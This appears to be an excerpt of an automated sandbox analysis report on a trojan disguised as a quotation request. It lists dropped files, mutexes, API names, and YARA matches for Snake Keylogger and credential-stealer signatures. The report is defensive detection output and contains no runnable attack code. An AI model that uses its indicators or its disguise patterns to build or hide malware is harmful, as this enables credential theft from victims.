Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 10_2_053D9360	10_2_053D9360
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 10_2_053D7FAE	10_2_053D7FAE
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 10_2_053DC520	10_2_053DC520
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 10_2_053DC51A	10_2_053DC51A
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 10_2_053DC4E7	10_2_053DC4E7
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 10_2_053D934F	10_2_053D934F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0269D28B	14_2_0269D28B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0269C1AB	14_2_0269C1AB
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0269C74B	14_2_0269C74B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0269C47B	14_2_0269C47B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0269CA1B	14_2_0269CA1B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_026969A0	14_2_026969A0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0269E988	14_2_0269E988
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_02693E09	14_2_02693E09
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_02696FC8	14_2_02696FC8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0269CFBB	14_2_0269CFBB
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0269CCEB	14_2_0269CCEB
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_02699DE0	14_2_02699DE0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_02695383	14_2_02695383
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_02693AA1	14_2_02693AA1
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0269F974	14_2_0269F974
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_026929EC	14_2_026929EC
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06551E80	14_2_06551E80
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06550B30	14_2_06550B30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_065517A0	14_2_065517A0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655FC68	14_2_0655FC68
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06559C18	14_2_06559C18
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06555028	14_2_06555028
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06559548	14_2_06559548
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06552968	14_2_06552968
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655E258	14_2_0655E258
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655E24A	14_2_0655E24A
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06551E70	14_2_06551E70
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655DE00	14_2_0655DE00
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655EAF8	14_2_0655EAF8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655E6B0	14_2_0655E6B0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655E6AF	14_2_0655E6AF
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655EF60	14_2_0655EF60
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655EB08	14_2_0655EB08
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06550B20	14_2_06550B20
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655178F	14_2_0655178F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655F3B8	14_2_0655F3B8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06558BA0	14_2_06558BA0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06550040	14_2_06550040
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655F810	14_2_0655F810
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_06555018	14_2_06555018
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655F802	14_2_0655F802
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655003F	14_2_0655003F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655D0F8	14_2_0655D0F8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655CCA0	14_2_0655CCA0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655D550	14_2_0655D550
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655D540	14_2_0655D540
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655DDFF	14_2_0655DDFF
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655D9A7	14_2_0655D9A7
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0655D9A8	14_2_0655D9A8

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1418858340.00000000057F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1412513003.000000000127E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1420336040.000000000A97D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1420336040.000000000A97D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.000000000434B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1415188848.000000000315D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1419550863.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3825388086.0000000000FD7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Binary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NuDUTBObHpKADz.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, ---.cs	Base64 encoded string: 'RvaDBqLex+H7VQrltB7IHeqxo4wofVTOiAhtftTiQbn1Z/62t6lZAA=='
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, ---.cs	Base64 encoded string: 'RvaDBqLex+H7VQrltB7IHeqxo4wofVTOiAhtftTiQbn1Z/62t6lZAA=='

Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/25@3/3

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

File created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Mutant created: \Sessions\1\BaseNamedObjects\upSDuQ
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:592:120:WilError_03

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

File created: C:\Users\user\AppData\Local\Temp\tmp8B51.tmp

Jump to behavior

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr	Binary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr	Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr	Binary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr	Binary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr	Binary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr	Binary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr	Binary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr	Binary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
